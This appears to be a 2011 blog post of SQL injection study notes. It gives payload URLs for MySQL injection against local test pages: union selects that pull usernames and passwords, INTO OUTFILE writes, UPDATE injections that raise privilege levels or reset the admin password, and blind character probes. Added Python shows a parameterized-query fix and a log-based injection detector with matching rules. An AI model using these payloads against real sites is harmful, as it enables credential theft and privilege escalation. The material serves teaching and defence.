Date: 2011-11-10  Views: 20451

  Today I learned the basics of SQL injection from the web. The key to SQL injection is constructing SQL statements; only by using SQL flexibly can you build powerful injection strings. After studying I wrote down some notes so they are ready for use at any time. I hope you understand the basic principles of SQL before reading the content below. The code in these notes comes from the internet.

  ===Basics===

  Same-table queries:

  http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6

  http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

  UNION statements:

  http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*

  http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

  Writing out files:

  http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt

  http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt

  http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

  INSERT statements:

  INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');

  Construct the homepage value as: http://4ngel.net', '3')#

  The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');

  UPDATE statements: I like this kind of thing

  First understand this SQL statement

  UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

  If this SQL is altered into any of the following forms, injection is achieved

  1: Change the homepage value to

  http://4ngel.net', userlevel='3

  The SQL statement then becomes

  UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'

  userlevel is the user's privilege level

  2: Change the password value to

  mypass)' WHERE username='admin'#

  The SQL statement then becomes

  UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

  3: Change the id value to

  ' OR username='admin'

  The SQL statement then becomes

  UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
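The three UPDATE cases above all come from the same defect: user-supplied values are spliced into the SQL text, so a quote in the value ends the string literal and the rest becomes SQL. The following example is added here and is not code from the original notes. It replays case 1 (the homepage value) against a constructed in-memory SQLite table that mirrors the notes' `user` table, once through the notes' string-splicing UPDATE and once through a placeholder (parameterized) UPDATE, and returns what each one actually stored. SQLite stands in for MySQL, so the `MD5()` wrapper is left out; the table schema and the seed row are assumptions.

```python
import sqlite3

# Constructed payload, taken from UPDATE case 1 above: it closes the homepage
# string literal and appends an extra column assignment.
HOMEPAGE_PAYLOAD = "http://4ngel.net', userlevel='3"


def make_db() -> sqlite3.Connection:
    """Build a throwaway in-memory `user` table (constructed schema and seed row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, homepage TEXT, userlevel TEXT)"
    )
    conn.execute(
        "INSERT INTO user VALUES (1, 'angel', 'oldpass', 'http://example.invalid', '1')"
    )
    conn.commit()
    return conn


def update_profile_vulnerable(conn, user_id, password, homepage):
    """The notes' UPDATE pattern: values spliced straight into the SQL text.
    (MD5() is omitted because SQLite has no MD5 function.)"""
    sql = (
        f"UPDATE user SET password='{password}', homepage='{homepage}' "
        f"WHERE id='{user_id}'"
    )
    conn.execute(sql)
    conn.commit()
    return sql  # returned so the caller can see the statement that really ran


def update_profile_safe(conn, user_id, password, homepage):
    """Hardened form: placeholders; the driver sends values separately from the SQL,
    so a quote inside a value can never terminate the literal."""
    conn.execute(
        "UPDATE user SET password=?, homepage=? WHERE id=?",
        (password, homepage, user_id),
    )
    conn.commit()


def read_user(conn, user_id):
    """Return the columns the payload targets, for comparison."""
    row = conn.execute(
        "SELECT homepage, userlevel FROM user WHERE id=?", (user_id,)
    ).fetchone()
    return {"homepage": row[0], "userlevel": row[1]}


def demo():
    """Run the same payload through both forms and return (vulnerable, safe) results."""
    conn = make_db()
    update_profile_vulnerable(conn, 1, "mypass", HOMEPAGE_PAYLOAD)
    vulnerable_result = read_user(conn, 1)

    conn = make_db()
    update_profile_safe(conn, 1, "mypass", HOMEPAGE_PAYLOAD)
    safe_result = read_user(conn, 1)
    return vulnerable_result, safe_result


if __name__ == "__main__":
    vuln, safe = demo()
    print("vulnerable:", vuln)  # userlevel silently changed to '3'
    print("safe:      ", safe)  # payload stored as a plain string, userlevel untouched
```

In the spliced version the executed statement is exactly the one the notes show, and `userlevel` ends up as `'3'`; in the placeholder version the whole payload is stored verbatim as the homepage and `userlevel` stays `'1'`. The server settings listed under injection prevention at the end of the notes only blunt this; placeholders remove the cause.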

  ===Advanced===

  Commonly used MySQL built-in functions

  DATABASE()

  USER()

  SYSTEM_USER()

  SESSION_USER()

  CURRENT_USER()

  database()

  version()

  SUBSTRING()

  MID()

  char()

  load_file()

  ……

  Applying the functions

  UPDATE article SET title=DATABASE() WHERE id=1

  http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()

  SELECT * FROM user WHERE username=char(97,110,103,101,108)

  # char(97,110,103,101,108) is equivalent to 'angel', expressed in decimal

  http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)

  http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)

  http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

  Determining the number and types of columns

  http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1

  http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

  Guessing table names

  http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members

  Cross-table query to obtain usernames and passwords

  http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

  Other

  # Verifying the first character of the password

  http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
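Every request in this section leaves a recognisable trace in the web server's access log: a UNION SELECT, an INTO OUTFILE, a char() sequence, an ord(mid()) character probe, or a bare recon function such as database() or version(). The following detector is an added example, not part of the original notes. It decodes the query string of each log line (twice, to catch double URL-encoding), then runs a small rule set built from the request shapes shown above and reports which rules fired per line. The log lines are constructed for this example and reuse the notes' request shapes; they are not real traffic.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not real traffic). The first three reuse request
# shapes from the notes above; the last two are ordinary requests.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Nov/2011:10:01:02 +0800] "GET /injection/show.php?id=-1%20union%20select%201,database(),version() HTTP/1.1" 200 512
127.0.0.1 - - [10/Nov/2011:10:01:05 +0800] "GET /injection/user.php?userid=1%20and%20ord(mid(password,3,1))%3E111 HTTP/1.1" 200 88
127.0.0.1 - - [10/Nov/2011:10:01:09 +0800] "GET /injection/show.php?id='%20union%20select%201,username,password%20from%20user%20into%20outfile%20'c:/user.txt HTTP/1.1" 500 0
127.0.0.1 - - [10/Nov/2011:10:02:00 +0800] "GET /injection/show.php?id=42 HTTP/1.1" 200 2048
127.0.0.1 - - [10/Nov/2011:10:02:03 +0800] "GET /injection/user.php?username=angel HTTP/1.1" 200 300
"""

# Pulls method, request target and status out of a common-log-format line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# One rule per technique listed in the notes; names are for the analyst's benefit.
RULES = [
    ("union_select", re.compile(r"\bunion\b[\s/*]+(?:all\s+)?\bselect\b", re.I)),
    ("into_outfile", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("char_encoding", re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)*\s*\)", re.I)),
    ("blind_char_probe", re.compile(r"\b(?:ord|ascii)\s*\(\s*(?:mid|substring|substr)\s*\(", re.I)),
    ("builtin_recon", re.compile(
        r"\b(?:database|version|user|system_user|session_user|current_user|load_file)\s*\(", re.I)),
    ("comment_terminator", re.compile(r"/\*|#|--\s")),
]


def normalise_query(target: str) -> str:
    """Decode the query string twice (to unwrap double-encoding) and squeeze whitespace."""
    query = urlsplit(target).query
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded)


def scan_line(line: str):
    """Return the names of the rules that match a single access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    query = normalise_query(m.group("target"))
    return [name for name, rx in RULES if rx.search(query)]


def scan_log(text: str):
    """Map each flagged line (1-based index) to the list of rules it triggered."""
    hits = {}
    for idx, line in enumerate(text.splitlines(), start=1):
        names = scan_line(line)
        if names:
            hits[idx] = names
    return hits


if __name__ == "__main__":
    for idx, names in scan_log(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(names)}")
```

The rules are deliberately keyed to whole tokens (`\bunion\b`, `char(` followed by digits) so that ordinary values such as `username=angel` do not trip the `user(` recon rule. In practice this belongs behind a WAF or log pipeline rather than a cron job, and the match list is a starting point for triage, not a verdict.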

  ===Injection prevention===

  Server side

  Set magic_quotes_gpc to On

  Set display_errors to Off